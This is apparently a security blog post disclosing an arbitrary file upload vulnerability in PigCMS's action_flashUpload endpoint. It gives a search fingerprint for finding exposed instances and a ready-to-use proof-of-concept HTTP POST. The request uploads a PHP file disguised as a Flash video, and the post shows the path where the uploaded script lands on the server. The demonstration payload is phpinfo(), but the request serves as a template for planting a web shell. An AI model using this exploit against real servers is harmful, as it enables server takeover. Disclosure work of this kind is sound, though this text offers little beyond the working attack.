Pigcms Action_flashupload Any File Upload Vulnerability
Pigcms Action_flashupload Any File Upload Vulnerability
PigCMS action_flashUpload any file upload vulnerability
Vulnerability Description
There is a vulnerability to upload any file in the PigCMS action_flashUpload method. The attacker can upload any file to obtain server permissions through the vulnerability.
Vulnerability Impact
pigcms
Network surveying and mapping
app.name=”PigCMS”
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
6
7
8
9
10
11
POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv
<?php phpinfo();?>
------aaa
1
/cms/upload/images/2023/08/11/1691722887xXbx.php
This post is licensed under CC BY 4.0 by the author.